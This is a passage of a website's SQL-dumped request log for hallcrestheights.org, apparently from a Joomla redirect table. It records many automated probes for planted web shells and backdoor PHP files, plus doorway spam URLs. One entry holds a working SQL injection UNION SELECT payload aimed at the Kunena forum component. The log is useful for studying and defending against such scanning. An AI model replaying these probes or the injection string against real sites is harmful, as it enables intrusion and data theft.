00:00:00'),(8274,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=R2FYTVRNLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:50:11','0000-00-00 00:00:00'),(8275,'http://hallcrestheights.org//cache/list.php?z3=R2FYTVRNLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-04-22 07:50:13','0000-00-00 00:00:00'),(8276,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/GaXMTM.php',NULL,'','',1,0,'2017-04-22 07:52:58','0000-00-00 00:00:00'),(8277,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/GaXMTM.php',NULL,'','',1,0,'2017-04-22 07:53:00','0000-00-00 00:00:00'),(8278,'http://hallcrestheights.org//wp-content/uploads/GaXMTM.php',NULL,'','',1,0,'2017-04-22 07:53:05','0000-00-00 00:00:00'),(8279,'http://hallcrestheights.org//GaXMTM.php',NULL,'','',1,0,'2017-04-22 07:53:06','0000-00-00 00:00:00'),(8280,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/GaXMTM.php',NULL,'','',1,0,'2017-04-22 07:53:08','0000-00-00 00:00:00'),(8281,'http://hallcrestheights.org/includes/xml.php',NULL,'http://hallcrestheights.org/includes/xml.php','',1,0,'2017-04-22 13:29:27','0000-00-00 00:00:00'),(8282,'http://hallcrestheights.org/components/com_ajax/ajax.lib.php',NULL,'http://hallcrestheights.org/components/com_ajax/ajax.lib.php','',4,0,'2017-04-22 13:29:28','0000-00-00 00:00:00'),(8283,'http://hallcrestheights.org/templates/system/print.php?error',NULL,'http://hallcrestheights.org/templates/system/print.php?error','',1,0,'2017-04-22 13:29:43','0000-00-00 00:00:00'),(8284,'http://hallcrestheights.org/plugins/content/mysql/config.php',NULL,'http://hallcrestheights.org/plugins/content/mysql/config.php','',1,0,'2017-04-22 13:29:43','0000-00-00 00:00:00'),(8285,'http://hallcrestheights.org/modules/mod_articles_news/tmpl/data.php',NULL,'http://hallcrestheights.org/modules/mod_articles_news/tmpl/data.php','',1,0,'2017-04-22 13:29:43','0000-00-00 00:00:00'),(8286,'http://hallcrestheights.org/libraries/joomla/application/data.php',NULL,'http://hallcrestheights.org/libraries/joomla/application/data.php','',1,0,'2017-04-22 13:29:43','0000-00-00 00:00:00'),(8287,'http://hallcrestheights.org/templates/view/html/layouts/joomla/content/default.php?compact',NULL,'http://hallcrestheights.org/templates/view/html/layouts/joomla/content/default.php?compact','',1,0,'2017-04-22 13:29:43','0000-00-00 00:00:00'),(8288,'http://hallcrestheights.org/libraries/f0f/platform/filesystem/forms.php?component',NULL,'http://hallcrestheights.org/libraries/f0f/platform/filesystem/forms.php?component','',1,0,'2017-04-22 13:29:44','0000-00-00 00:00:00'),(8289,'http://hallcrestheights.org/libraries/fof/include.lib.php',NULL,'http://hallcrestheights.org/libraries/fof/include.lib.php','',1,0,'2017-04-22 13:29:44','0000-00-00 00:00:00'),(8290,'http://hallcrestheights.org/libraries/joomla/caches.php?ina',NULL,'http://hallcrestheights.org/libraries/joomla/caches.php?ina','',3,0,'2017-04-22 13:29:44','0000-00-00 00:00:00'),(8291,'http://hallcrestheights.org/components/com_users/views/registration/old_e1c.php',NULL,'http://hallcrestheights.org/components/com_users/views/registration/old_e1c.php','',1,0,'2017-04-22 20:59:30','0000-00-00 00:00:00'),(8292,'http://hallcrestheights.org/components/com_content/models/config.php',NULL,'http://hallcrestheights.org/components/com_content/models/config.php','',1,0,'2017-04-22 20:59:30','0000-00-00 00:00:00'),(8293,'http://hallcrestheights.org/cache/rokquickcart/cart/images/rokquickcart/samples/samples.php',NULL,'http://hallcrestheights.org/cache/rokquickcart/cart/images/rokquickcart/samples/samples.php','',1,0,'2017-04-22 20:59:30','0000-00-00 00:00:00'),(8294,'http://hallcrestheights.org/aws.php',NULL,'http://hallcrestheights.org/aws.php','',1,0,'2017-04-22 20:59:30','0000-00-00 00:00:00'),(8295,'http://hallcrestheights.org/components/com_jce/media/js/readme.php',NULL,'http://hallcrestheights.org/components/com_jce/media/js/readme.php','',1,0,'2017-04-22 20:59:30','0000-00-00 00:00:00'),(8296,'http://hallcrestheights.org/components/com_weblinks/links.php',NULL,'http://hallcrestheights.org/components/com_weblinks/links.php','',2,0,'2017-04-22 20:59:31','0000-00-00 00:00:00'),(8297,'http://hallcrestheights.org/modules/mod_araticlws/mod_araticlws.php',NULL,'http://hallcrestheights.org/modules/mod_araticlws/mod_araticlws.php','',3,0,'2017-04-22 21:00:00','0000-00-00 00:00:00'),(8298,'http://hallcrestheights.org/images/shop_image/product/config.php',NULL,'http://hallcrestheights.org/images/shop_image/product/config.php','',1,0,'2017-04-22 21:00:01','0000-00-00 00:00:00'),(8299,'http://hallcrestheights.org/mambots/editors-xtd/read.php',NULL,'http://hallcrestheights.org/mambots/editors-xtd/read.php','',1,0,'2017-04-22 21:00:01','0000-00-00 00:00:00'),(8300,'http://hallcrestheights.org/images/web-info.php',NULL,'http://hallcrestheights.org/images/web-info.php','',2,0,'2017-04-22 21:00:01','0000-00-00 00:00:00'),(8301,'http://hallcrestheights.org/libraries/fof/model/behavior/backup.php',NULL,'http://hallcrestheights.org/libraries/fof/model/behavior/backup.php','',1,0,'2017-04-22 21:00:01','0000-00-00 00:00:00'),(8302,'http://hallcrestheights.org/libraries/joomla/extended.php',NULL,'http://hallcrestheights.org/libraries/joomla/extended.php','',2,0,'2017-04-22 21:00:01','0000-00-00 00:00:00'),(8303,'http://hallcrestheights.org/modules/mod_widget/mod_widget.php',NULL,'http://hallcrestheights.org/modules/mod_widget/mod_widget.php','',2,0,'2017-04-22 21:01:42','0000-00-00 00:00:00'),(8304,'http://hallcrestheights.org/modules/mod_googlemapsapi/mod_googlemapsapi.php',NULL,'http://hallcrestheights.org/modules/mod_googlemapsapi/mod_googlemapsapi.php','',1,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8305,'http://hallcrestheights.org/seminarios/aws.php',NULL,'http://hallcrestheights.org/seminarios/aws.php','',1,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8306,'http://hallcrestheights.org/modules/mod_mysqlw/mod_mysqlw.php',NULL,'http://hallcrestheights.org/modules/mod_mysqlw/mod_mysqlw.php','',2,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8307,'http://hallcrestheights.org/modules/mod_cmscore/mod_cmscore.php',NULL,'http://hallcrestheights.org/modules/mod_cmscore/mod_cmscore.php','',1,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8308,'http://hallcrestheights.org/plugins/vmpayment/moneybookers_idl/language/backup.php',NULL,'http://hallcrestheights.org/plugins/vmpayment/moneybookers_idl/language/backup.php','',1,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8309,'http://hallcrestheights.org/modules/mod_systemzz/mod_systemzz.php',NULL,'http://hallcrestheights.org/modules/mod_systemzz/mod_systemzz.php','',1,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8310,'http://hallcrestheights.org/templates/beez/html/com_user/remind/remind.php',NULL,'http://hallcrestheights.org/templates/beez/html/com_user/remind/remind.php','',1,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8311,'http://hallcrestheights.org/modules/mod_secure_help/mod_secure_help.php',NULL,'http://hallcrestheights.org/modules/mod_secure_help/mod_secure_help.php','',1,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8312,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/404.php','',3,0,'2017-04-22 21:01:43','0000-00-00 00:00:00'),(8313,'http://hallcrestheights.org/templates/tcvn_alevel/language/en-gb/backup.php',NULL,'http://hallcrestheights.org/templates/tcvn_alevel/language/en-gb/backup.php','',1,0,'2017-04-22 21:03:28','0000-00-00 00:00:00'),(8314,'http://hallcrestheights.org/tmp/aws.php',NULL,'http://hallcrestheights.org/tmp/aws.php','',1,0,'2017-04-22 21:03:28','0000-00-00 00:00:00'),(8315,'http://hallcrestheights.org/tmp/cacheplugin.php',NULL,'http://hallcrestheights.org/tmp/cacheplugin.php','',1,0,'2017-04-22 21:03:28','0000-00-00 00:00:00'),(8316,'http://hallcrestheights.org/tmp/bsvi9.php',NULL,'http://hallcrestheights.org/tmp/bsvi9.php','',1,0,'2017-04-22 21:03:28','0000-00-00 00:00:00'),(8317,'http://hallcrestheights.org/wmfgqbj.php',NULL,'http://hallcrestheights.org/wmfgqbj.php','',1,0,'2017-04-22 21:03:28','0000-00-00 00:00:00'),(8318,'http://hallcrestheights.org/\r/wp-admin/admin-ajax.php',NULL,'','',2,0,'2017-04-23 05:09:44','0000-00-00 00:00:00'),(8319,'http://hallcrestheights.org/modules/mod_bookmark/tmpl/default.php',NULL,'','',2,0,'2017-04-23 15:28:13','0000-00-00 00:00:00'),(8320,'http://hallcrestheights.org/components/com_search/models/system.php',NULL,'','',1,0,'2017-04-23 15:28:13','0000-00-00 00:00:00'),(8321,'http://hallcrestheights.org/ngtlplus/flink.php',NULL,'','',1,0,'2017-04-24 14:40:14','0000-00-00 00:00:00'),(8322,'http://www.hallcrestheights.org/lugdl-k6364-trsm-xxhy-pzqjllzo-hnjumnte-i20162633-cwfogy-wbiwy-rurfgv-fcwqz.htm',NULL,'http://search.yahoo.co.jp/','',4,0,'2017-04-25 05:29:11','0000-00-00 00:00:00'),(8323,'http://hallcrestheights.org/index.php?option=com_kunena&func=userlist&search=%\'+and+1=2)+union+select+1,concat(0x7e,table_name,0x7e),2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453 -- ;',NULL,'http://hallcrestheights.org/index.php?option=com_kunena&func=userlist&search=%25\'+and+1=2)+union+select+1,concat(0x7e,table_name,0x7e),2,3,4,5,6,7,8,9','',2,0,'2017-04-25 11:46:24','0000-00-00 00:00:00'),(8324,'http://www.hallcrestheights.org/i20162632-k5120-ixnmueah-whioz-hjxbnwpg-eyooayi.htm',NULL,'http://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjb8s_DusHTAhXFU7wKHaboBwkQFggnMAA&url=http%3A%2F%2Fwww.hallcrestheights.or','',3,0,'2017-04-26 06:07:56','0000-00-00 00:00:00'),(8325,'http://www.hallcrestheights.org/k62180-vqjnyspv-holjp-i20162630-eurrtpil-uourxiv.htm',NULL,'','',2,0,'2017-04-29 15:43:25','0000-00-00 00:00:00'),(8326,'http://www.hallcrestheights.org/qlbowci-ggece-i20162636-ayafxr-glnikg-hhmbb-k12533-xpge/',NULL,'','',3,0,'2017-04-29 17:22:25','0000-00-00 00:00:00'),(8327,'http://www.hallcrestheights.org/wbwpb-k28817-onkydh-i20162634-xjjik-vfvt/',NULL,'','',2,0,'2017-04-29 18:46:57','0000-00-00 00:00:00'),(8328,'http://www.hallcrestheights.org/soegszxy-k19061-ifet-vtndyuu-i20162635-hvfcyzls/',NULL,'','',2,0,'2017-04-29 19:46:35','0000-00-00 00:00:00'),(8329,'http://hallcrestheights.org/login.php',NULL,'','',1,0,'2017-04-29 20:25:13','0000-00-00 00:00:00'),(8330,'http://www.hallcrestheights.org/fadlaj-k6136-fnlgfp-cvwgmy-i20162628-hdec-wxbdeu.htm',NULL,'','',2,0,'2017-04-29 21:56:01','0000-00-00 00:00:00'),(8331,'http://www.hallcrestheights.org/i20162628-wbwpbonk-ydhx-jjikvfv-tzpxbxkc-wjybtylw-k7601-osdu/',NULL,'','',2,0,'2017-04-30 01:28:11','0000-00-00 00:00:00'),(8332,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai-i20162632-imjz-k5909-fozgdvd/',NULL,'','',2,0,'2017-04-30 02:08:05','0000-00-00 00:00:00'),(8333,'http://www.hallcrestheights.org/zmkue-dtzj-i20162636-k53024-ivyo-qxifgxuh-xptvuhmi-wnzkor.htm',NULL,'','',2,0,'2017-04-30 02:18:22','0000-00-00 00:00:00'),(8334,'http://www.hallcrestheights.org/ajqxxuc-uzaof-ifephi-i20162637-ijimjn-jbogt-k27833-sakb/',NULL,'','',2,0,'2017-04-30 03:48:01','0000-00-00 00:00:00'),(8335,'http://www.hallcrestheights.org/cwhriwgp-i20162629-k32741-ekzq-dwkvumz-bsaiimjz/',NULL,'','',2,0,'2017-04-30 05:21:50','0000-00-00 00:00:00'),(8336,'http://www.hallcrestheights.org/k32084-fadla-jfnl-i20162634-gfpc-vwgmyhde.htm',NULL,'','',3,0,'2017-04-30 07:49:03','0000-00-00 00:00:00'),(8337,'http://www.hallcrestheights.org/i20162635-k44080-zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz.htm',NULL,'','',4,0,'2017-04-30 07:50:54','0000-00-00 00:00:00'),(8338,'http://www.hallcrestheights.org/mrcqg-beif-i20162636-k32324-uwgr-abtnwyrq-semgwkow-hmemxg.htm',NULL,'','',2,0,'2017-04-30 08:54:17','0000-00-00 00:00:00'),(8339,'http://www.hallcrestheights.org/k48536-lugdlt-i20162637-rsmxxh-ypzqjl-lzoh.htm',NULL,'','',2,0,'2017-04-30 09:13:16','0000-00-00 00:00:00'),(8340,'http://hallcrestheights.org/shellpassword.php',NULL,'','',1,0,'2017-04-30 09:51:37','0000-00-00 00:00:00'),(8341,'http://hallcrestheights.org/kj2.php',NULL,'','',1,0,'2017-04-30 09:51:41','0000-00-00 00:00:00'),(8342,'http://hallcrestheights.org/alfa.php',NULL,'','',1,0,'2017-04-30 09:51:46','0000-00-00 00:00:00'),(8343,'http://hallcrestheights.org/~.php',NULL,'','',1,0,'2017-04-30 09:51:47','0000-00-00 00:00:00'),(8344,'http://hallcrestheights.org/wild.php',NULL,'','',1,0,'2017-04-30 09:51:50','0000-00-00 00:00:00'),(8345,'http://hallcrestheights.org/xp7.php',NULL,'','',1,0,'2017-04-30 09:51:56','0000-00-00 00:00:00'),(8346,'http://hallcrestheights.org/acz.php',NULL,'','',1,0,'2017-04-30 09:52:09','0000-00-00 00:00:00'),(8347,'http://hallcrestheights.org/kkk.php',NULL,'','',1,0,'2017-04-30 09:52:11','0000-00-00 00:00:00'),(8348,'http://hallcrestheights.org//wp-content/Moded.php',NULL,'','',1,0,'2017-04-30 09:52:12','0000-00-00 00:00:00'),(8349,'http://hallcrestheights.org/fikou.php',NULL,'','',1,0,'2017-04-30 09:52:14','0000-00-00 00:00:00'),(8350,'http://hallcrestheights.org/cca.php',NULL,'','',1,0,'2017-04-30 09:52:15','0000-00-00 00:00:00'),(8351,'http://hallcrestheights.org/ji.php',NULL,'','',1,0,'2017-04-30 09:52:20','0000-00-00 00:00:00'),(8352,'http://hallcrestheights.org/wp-content/123456789.php',NULL,'','',1,0,'2017-04-30 09:52:22','0000-00-00 00:00:00'),(8353,'http://hallcrestheights.org/webroot.php',NULL,'','',2,0,'2017-04-30 09:52:26','0000-00-00 00:00:00'),(8354,'http://hallcrestheights.org/80.php',NULL,'','',1,0,'2017-04-30 09:52:27','0000-00-00 00:00:00'),(8355,'http://hallcrestheights.org/r3x.php',NULL,'','',43,0,'2017-04-30 09:52:28','0000-00-00 00:00:00'),(8356,'http://hallcrestheights.org/yar.php',NULL,'','',1,0,'2017-04-30 09:52:30','0000-00-00 00:00:00'),(8357,'http://hallcrestheights.org/x-mailer.php',NULL,'','',1,0,'2017-04-30 09:52:31','0000-00-00 00:00:00'),(8358,'http://hallcrestheights.org/wp-log.php',NULL,'','',1,0,'2017-04-30 09:52:34','0000-00-00 00:00:00'),(8359,'http://hallcrestheights.org/wp-content/wp-log.php',NULL,'','',1,0,'2017-04-30 09:52:44','0000-00-00 00:00:00'),(8360,'http://hallcrestheights.org/wp-content/nemo.php',NULL,'','',1,0,'2017-04-30 09:52:47','0000-00-00 00:00:00'),(8361,'http://hallcrestheights.org/wp-content/MC.php',NULL,'','',1,0,'2017-04-30 09:52:52','0000-00-00 00:00:00'),(8362,'http://hallcrestheights.org/wp-content/islam.php',NULL,'','',1,0,'2017-04-30 09:52:54','0000-00-00 00:00:00'),(8363,'http://hallcrestheights.org/wp-content/sh.php',NULL,'','',1,0,'2017-04-30 09:52:56','0000-00-00 00:00:00'),(8364,'http://hallcrestheights.org/wp-content/A.php',NULL,'','',1,0,'2017-04-30 09:52:58','0000-00-00 00:00:00'),(8365,'http://hallcrestheights.org/afj.php',NULL,'','',1,0,'2017-04-30 09:53:01','0000-00-00 00:00:00'),(8366,'http://hallcrestheights.org/wp-content/ita.php',NULL,'','',1,0,'2017-04-30 09:53:23','0000-00-00 00:00:00'),(8367,'http://hallcrestheights.org/wp-content/un.php',NULL,'','',1,0,'2017-04-30 09:53:26','0000-00-00 00:00:00'),(8368,'http://hallcrestheights.org/wp-includes/wp-mails.php',NULL,'','',1,0,'2017-04-30 09:53:29','0000-00-00 00:00:00'),(8369,'http://hallcrestheights.org/dd.php',NULL,'','',2,0,'2017-04-30 09:53:32','0000-00-00 00:00:00'),(8370,'http://hallcrestheights.org/vb.php',NULL,'','',1,0,'2017-04-30 09:53:34','0000-00-00 00:00:00'),(8371,'http://hallcrestheights.org/xe.php',NULL,'','',1,0,'2017-04-30 09:53:35','0000-00-00 00:00:00'),(8372,'http://hallcrestheights.org/TOp.php',NULL,'','',1,0,'2017-04-30 09:53:36','0000-00-00 00:00:00'),(8373,'http://hallcrestheights.org/...php',NULL,'','',1,0,'2017-04-30 09:53:45','0000-00-00 00:00:00'),(8374,'http://hallcrestheights.org/utf.php',NULL,'','',1,0,'2017-04-30 09:54:00','0000-00-00 00:00:00'),(8375,'http://hallcrestheights.org/vGass.php',NULL,'','',1,0,'2017-04-30 09:54:14','0000-00-00 00:00:00'),(8376,'http://hallcrestheights.org/infox.php',NULL,'','',1,0,'2017-04-30 09:54:17','0000-00-00 00:00:00'),(8377,'http://hallcrestheights.org/xGSx.php',NULL,'','',14,0,'2017-04-30 09:54:19','0000-00-00 00:00:00'),(8378,'http://hallcrestheights.org/M-F4r3s.php',NULL,'','',11,0,'2017-04-30 09:54:27','0000-00-00 00:00:00'),(8379,'http://hallcrestheights.org/cc.php',NULL,'','',2,0,'2017-04-30 09:54:28','0000-00-00 00:00:00'),(8380,'http://hallcrestheights.org/xfx.php',NULL,'','',1,0,'2017-04-30 09:54:40','0000-00-00 00:00:00'),(8381,'http://hallcrestheights.org/ps2.php',NULL,'','',1,0,'2017-04-30 09:54:46','0000-00-00 00:00:00'),(8382,'http://hallcrestheights.org/20s16.php',NULL,'','',1,0,'2017-04-30 09:54:53','0000-00-00 00:00:00'),(8383,'http://hallcrestheights.org/wpmass.php',NULL,'','',2,0,'2017-04-30 09:55:07','0000-00-00 00:00:00'),(8384,'http://hallcrestheights.org/wp.php',NULL,'','',2,0,'2017-04-30 09:55:10','0000-00-00 00:00:00'),(8385,'http://hallcrestheights.org/xx.php',NULL,'','',1,0,'2017-04-30 09:55:14','0000-00-00 00:00:00'),(8386,'http://hallcrestheights.org/ze.php',NULL,'','',1,0,'2017-04-30 09:55:34','0000-00-00 00:00:00'),(8387,'http://hallcrestheights.org/25.php',NULL,'','',1,0,'2017-04-30 09:55:44','0000-00-00 00:00:00'),(8388,'http://hallcrestheights.org/wss.php',NULL,'','',3,0,'2017-04-30 09:55:49','0000-00-00 00:00:00'),(8389,'http://hallcrestheights.org/81.php',NULL,'','',1,0,'2017-04-30 09:56:25','0000-00-00 00:00:00'),(8390,'http://hallcrestheights.org/7.php',NULL,'','',2,0,'2017-04-30 09:56:27','0000-00-00 00:00:00'),(8391,'http://hallcrestheights.org/b37.php',NULL,'','',1,0,'2017-04-30 09:56:34','0000-00-00 00:00:00'),(8392,'http://hallcrestheights.org/help.php',NULL,'','',52,0,'2017-04-30 09:56:39','0000-00-00 00:00:00'),(8393,'http://hallcrestheights.org/xd.php',NULL,'','',2,0,'2017-04-30 09:56:40','0000-00-00 00:00:00'),(8394,'http://hallcrestheights.org/ads.php',NULL,'','',1,0,'2017-04-30 09:56:42','0000-00-00 00:00:00'),(8395,'http://hallcrestheights.org/aa.php',NULL,'','',13,0,'2017-04-30 09:56:47','0000-00-00 00:00:00'),(8396,'http://hallcrestheights.org/2xhackmailer.php',NULL,'','',1,0,'2017-04-30 09:56:49','0000-00-00 00:00:00'),(8397,'http://hallcrestheights.org/clean.php',NULL,'','',1,0,'2017-04-30 09:56:52','0000-00-00 00:00:00'),(8398,'http://hallcrestheights.org/ws.php',NULL,'','',4,0,'2017-04-30 09:56:58','0000-00-00 00:00:00'),(8399,'http://hallcrestheights.org/ac.php',NULL,'','',2,0,'2017-04-30 09:56:59','0000-00-00 00:00:00'),(8400,'http://hallcrestheights.org/sh-2017.php',NULL,'','',6,0,'2017-04-30 09:56:59','0000-00-00 00:00:00'),(8401,'http://hallcrestheights.org//tmp/j.php',NULL,'','',1,0,'2017-04-30 09:57:00','0000-00-00 00:00:00'),(8402,'http://hallcrestheights.org/id.php',NULL,'','',1,0,'2017-04-30 09:57:01','0000-00-00 00:00:00'),(8403,'http://hallcrestheights.org/cmmw.php',NULL,'','',1,0,'2017-04-30 09:57:02','0000-00-00 00:00:00'),(8404,'http://hallcrestheights.org/fox.php',NULL,'','',1,0,'2017-04-30 09:57:03','0000-00-00 00:00:00'),(8405,'http://hallcrestheights.org/dat.php',NULL,'','',1,0,'2017-04-30 09:57:04','0000-00-00 00:00:00'),(8406,'http://hallcrestheights.org/psyco.php',NULL,'','',1,0,'2017-04-30 09:57:05','0000-00-00 00:00:00'),(8407,'http://hallcrestheights.org/frx.php',NULL,'','',2,0,'2017-04-30 09:57:06','0000-00-00 00:00:00'),(8408,'http://hallcrestheights.org/garrix.php',NULL,'','',1,0,'2017-04-30 09:57:07','0000-00-00 00:00:00'),(8409,'http://hallcrestheights.org/css.php',NULL,'','',36,0,'2017-04-30 09:57:09','0000-00-00 00:00:00'),(8410,'http://hallcrestheights.org/zebda.php',NULL,'','',26,0,'2017-04-30 09:57:10','0000-00-00 00:00:00'),(8411,'http://hallcrestheights.org/idx.php',NULL,'','',2,0,'2017-04-30 09:57:11','0000-00-00 00:00:00'),(8412,'http://hallcrestheights.org/ler.php',NULL,'','',3,0,'2017-04-30 09:57:12','0000-00-00 00:00:00'),(8413,'http://hallcrestheights.org//tmp/clean.php',NULL,'','',1,0,'2017-04-30 09:57:13','0000-00-00 00:00:00'),(8414,'http://hallcrestheights.org/tmp/ocp.php',NULL,'','',1,0,'2017-04-30 09:57:14','0000-00-00 00:00:00'),(8415,'http://hallcrestheights.org/tmp/dn3.php',NULL,'','',1,0,'2017-04-30 09:57:15','0000-00-00 00:00:00'),(8416,'http://hallcrestheights.org/tmp/ini.php',NULL,'','',2,0,'2017-04-30 09:57:17','0000-00-00 00:00:00'),(8417,'http://hallcrestheights.org/te.php',NULL,'','',6,0,'2017-04-30 09:57:18','0000-00-00 00:00:00'),(8418,'http://hallcrestheights.org/f.php',NULL,'','',34,0,'2017-04-30 09:57:20','0000-00-00 00:00:00'),(8419,'http://hallcrestheights.org/un.php',NULL,'','',2,0,'2017-04-30 09:57:24','0000-00-00 00:00:00'),(8420,'http://hallcrestheights.org/jm.php',NULL,'','',1,0,'2017-04-30 09:57:25','0000-00-00 00:00:00'),(8421,'http://hallcrestheights.org/.php',NULL,'','',1,0,'2017-04-30 09:57:25','0000-00-00 00:00:00'),(8422,'http://hallcrestheights.org/style.php',NULL,'','',1,0,'2017-04-30 09:57:27','0000-00-00 00:00:00'),(8423,'http://hallcrestheights.org/libraries/joomla/a.php',NULL,'','',1,0,'2017-04-30 09:57:28','0000-00-00 00:00:00'),(8424,'http://hallcrestheights.org/bypass.php',NULL,'','',1,0,'2017-04-30 09:57:29','0000-00-00 00:00:00'),(8425,'http://hallcrestheights.org/soster.php',NULL,'','',1,0,'2017-04-30 09:57:30','0000-00-00 00:00:00'),(8426,'http://hallcrestheights.org/spy.php',NULL,'','',3,0,'2017-04-30 09:57:31','0000-00-00 00:00:00'),(8427,'http://hallcrestheights.org/jij.php',NULL,'','',1,0,'2017-04-30 09:57:32','0000-00-00 00:00:00'),(8428,'http://hallcrestheights.org/inb.php',NULL,'','',1,0,'2017-04-30 09:57:34','0000-00-00 00:00:00'),(8429,'http://hallcrestheights.org/Findshell.php',NULL,'','',1,0,'2017-04-30 09:57:35','0000-00-00 00:00:00'),(8430,'http://hallcrestheights.org/libraries/joomla/js.php',NULL,'','',1,0,'2017-04-30 09:57:36','0000-00-00 00:00:00'),(8431,'http://hallcrestheights.org/prv-drs.php',NULL,'','',1,0,'2017-04-30 09:57:37','0000-00-00 00:00:00'),(8432,'http://hallcrestheights.org/libraries/joomla/go.php',NULL,'','',29,0,'2017-04-30 09:57:38','0000-00-00 00:00:00'),(8433,'http://hallcrestheights.org/mk.php',NULL,'','',1,0,'2017-04-30 09:57:40','0000-00-00 00:00:00'),(8434,'http://hallcrestheights.org/libraries/joomla/f.php',NULL,'','',1,0,'2017-04-30 09:57:41','0000-00-00 00:00:00'),(8435,'http://hallcrestheights.org/short.php',NULL,'','',1,0,'2017-04-30 09:57:42','0000-00-00 00:00:00'),(8436,'http://hallcrestheights.org/xaj.php',NULL,'','',1,0,'2017-04-30 09:57:46','0000-00-00 00:00:00'),(8437,'http://hallcrestheights.org/guide.php',NULL,'','',2,0,'2017-04-30 09:57:51','0000-00-00 00:00:00'),(8438,'http://hallcrestheights.org/xMx.php',NULL,'','',1,0,'2017-04-30 09:57:52','0000-00-00 00:00:00'),(8439,'http://hallcrestheights.org/0.php',NULL,'','',4,0,'2017-04-30 09:57:53','0000-00-00 00:00:00'),(8440,'http://hallcrestheights.org/dssd.php',NULL,'','',1,0,'2017-04-30 09:57:54','0000-00-00 00:00:00'),(8441,'http://hallcrestheights.org/Vip_Login.php',NULL,'','',1,0,'2017-04-30 09:57:55','0000-00-00 00:00:00'),(8442,'http://hallcrestheights.org/civok.php',NULL,'','',1,0,'2017-04-30 09:57:56','0000-00-00 00:00:00'),(8443,'http://hallcrestheights.org/vr.php',NULL,'','',1,0,'2017-04-30 09:58:00','0000-00-00 00:00:00'),(8444,'http://hallcrestheights.org/al.php',NULL,'','',1,0,'2017-04-30 09:58:01','0000-00-00 00:00:00'),(8445,'http://hallcrestheights.org/setting.php',NULL,'','',29,0,'2017-04-30 09:58:04','0000-00-00 00:00:00'),(8446,'http://hallcrestheights.org/b0x.php',NULL,'','',1,0,'2017-04-30 09:58:05','0000-00-00 00:00:00'),(8447,'http://hallcrestheights.org/kids.php',NULL,'','',1,0,'2017-04-30 09:58:06','0000-00-00 00:00:00'),(8448,'http://hallcrestheights.org/abc.php',NULL,'','',3,0,'2017-04-30 09:58:08','0000-00-00 00:00:00'),(8449,'http://hallcrestheights.org/shell.php',NULL,'','',10,0,'2017-04-30 09:58:08','0000-00-00 00:00:00'),(8450,'http://hallcrestheights.org/pzimi.php',NULL,'','',1,0,'2017-04-30 09:58:10','0000-00-00 00:00:00'),(8451,'http://hallcrestheights.org/lol.php',NULL,'','',1,0,'2017-04-30 09:58:10','0000-00-00 00:00:00'),(8452,'http://hallcrestheights.org/me.php',NULL,'','',1,0,'2017-04-30 09:58:11','0000-00-00 00:00:00'),(8453,'http://hallcrestheights.org/wXds.php',NULL,'','',1,0,'2017-04-30 09:58:12','0000-00-00 00:00:00'),(8454,'http://hallcrestheights.org/mw122000.php',NULL,'','',1,0,'2017-04-30 09:58:14','0000-00-00 00:00:00'),(8455,'http://hallcrestheights.org/bsn.php',NULL,'','',1,0,'2017-04-30 09:58:15','0000-00-00 00:00:00'),(8456,'http://hallcrestheights.org/bbs.php',NULL,'','',1,0,'2017-04-30 09:58:19','0000-00-00 00:00:00'),(8457,'http://hallcrestheights.org/go.php',NULL,'','',33,0,'2017-04-30 09:58:20','0000-00-00 00:00:00'),(8458,'http://hallcrestheights.org/t.php',NULL,'','',2,0,'2017-04-30 09:58:21','0000-00-00 00:00:00'),(8459,'http://hallcrestheights.org/Conan.php',NULL,'','',1,0,'2017-04-30 09:58:22','0000-00-00 00:00:00'),(8460,'http://hallcrestheights.org/zibi.php',NULL,'','',31,0,'2017-04-30 09:58:23','0000-00-00 00:00:00'),(8461,'http://hallcrestheights.org/mw.php',NULL,'','',1,0,'2017-04-30 09:58:24','0000-00-00 00:00:00'),(8462,'http://hallcrestheights.org/wsoflit.php',NULL,'','',1,0,'2017-04-30 09:58:25','0000-00-00 00:00:00'),(8463,'http://hallcrestheights.org/prob.php',NULL,'','',1,0,'2017-04-30 09:58:26','0000-00-00 00:00:00'),(8464,'http://hallcrestheights.org/m.php',NULL,'','',31,0,'2017-04-30 09:58:30','0000-00-00 00:00:00'),(8465,'http://hallcrestheights.org/K2000.php',NULL,'','',1,0,'2017-04-30 09:58:32','0000-00-00 00:00:00'),(8466,'http://hallcrestheights.org/22.php',NULL,'','',1,0,'2017-04-30 09:58:33','0000-00-00 00:00:00'),(8467,'http://hallcrestheights.org/dzxnxxdz.php',NULL,'','',1,0,'2017-04-30 09:58:34','0000-00-00 00:00:00'),(8468,'http://hallcrestheights.org/c2.php',NULL,'','',1,0,'2017-04-30 09:58:35','0000-00-00 00:00:00'),(8469,'http://hallcrestheights.org/vhost.php',NULL,'','',2,0,'2017-04-30 09:58:36','0000-00-00 00:00:00'),(8470,'http://hallcrestheights.org/Xmw12X.php',NULL,'','',1,0,'2017-04-30 09:58:37','0000-00-00 00:00:00'),(8471,'http://hallcrestheights.org/c.php',NULL,'','',3,0,'2017-04-30 09:58:41','0000-00-00 00:00:00'),(8472,'http://hallcrestheights.org/conf.php',NULL,'','',1,0,'2017-04-30 